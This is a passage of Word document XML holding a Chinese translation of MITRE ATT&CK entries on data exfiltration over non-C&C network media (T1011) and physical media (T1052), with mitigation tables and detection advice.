              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="70F21206" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="069F201C" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2122" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523EB601" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId252" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络入侵防御</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7614" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD91FA0" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用可以通过</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络签名来识别</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>攻击者恶意软件流量的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>入侵检测</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>防御系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>来缓解网络级别活动的影响。签名通常是协议中的唯一指示符，可能基于攻击者或工具的特定混淆技术，并且在各种恶意软件系列和版本中可能会有所不同。攻击者可能会随着时间的推移更改工具</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>&amp;C</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>签名，或者构建协议</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>来逃避常见防御工具的检测。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="219F83A0" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F896677" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552CDF29" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监</w:t>
      </w:r>
      <w:r w:rsidRPr="00127383">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>控</w:t>
      </w:r>
      <w:r w:rsidRPr="00127383">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00127383">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。分析网络数据中不常见的数据流（例如，客户端发送的数据明显多于从服务器接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收的数据）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A1285" w14:textId="48D7B0A3" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>非</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>C&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通道的数据渗漏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="30E18E60" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27253E00" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1011</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AC85CFE" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53A451B1" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61DECFD6" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户接口</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BD82B18" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EFA1633" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Itzik Kotler</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>SafeBreach</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B32A49B" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="581FB7F7" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E15652" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能发生在与</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通道不同的网络介质上。如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>&amp;C</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络是有线</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，则可能会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>iFi</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>连接，调制解调器，蜂窝数据连接，蓝牙，或其它射频</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>通道</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发生数据</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>渗漏</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果攻击者有足够的访问权限或足够近</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，他们可以选择这样做。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>而且</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>及主要的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>nternet</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>连接通道</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不安全，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因为数据不是在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>同一企业网络</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>路由</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B96E98" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:lastRenderedPageBreak/>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2861"/>
        <w:gridCol w:w="6875"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00127383" w14:paraId="0A571ED4" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2861" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="12D478CA" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6875" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7C2AA05E" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00127383" w:rsidRDefault="00127383" w:rsidP="00127383">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00127383">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="1331A595" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2861" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B46550D" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId253" w:history="1">
              <w:r w:rsidR="00127383" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>操作系统配置</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6875" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6439A9BD" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尽可能避免创建新的网络适配器。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72AA0A82" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00622513" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50350984" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常需要用户驱动的事件（例如，单击鼠标或按键）来访问网络的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在不使用此类事件的情况下访问网络，则</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>可能是恶意行为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBAEEF7" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控并调查对主机适配器设置的更改，例如添加和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或复制通信接口。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276E2BB6" w14:textId="68841751" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00127383">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>物理</w:t>
      </w:r>
      <w:r w:rsidR="00320CB6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>介质上</w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的数据渗漏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00127383" w:rsidRPr="00A65911" w14:paraId="6BA4F6CC" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488F9E83" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1052</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48C0E6AC" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：数据渗漏</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B5E4195" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A06B696" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统要求</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>存在物理介质或设备</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E9780F1" w14:textId="77777777" w:rsidR="00127383" w:rsidRPr="00A65911" w:rsidRDefault="00127383" w:rsidP="00D6184F">
            <w:pPr>
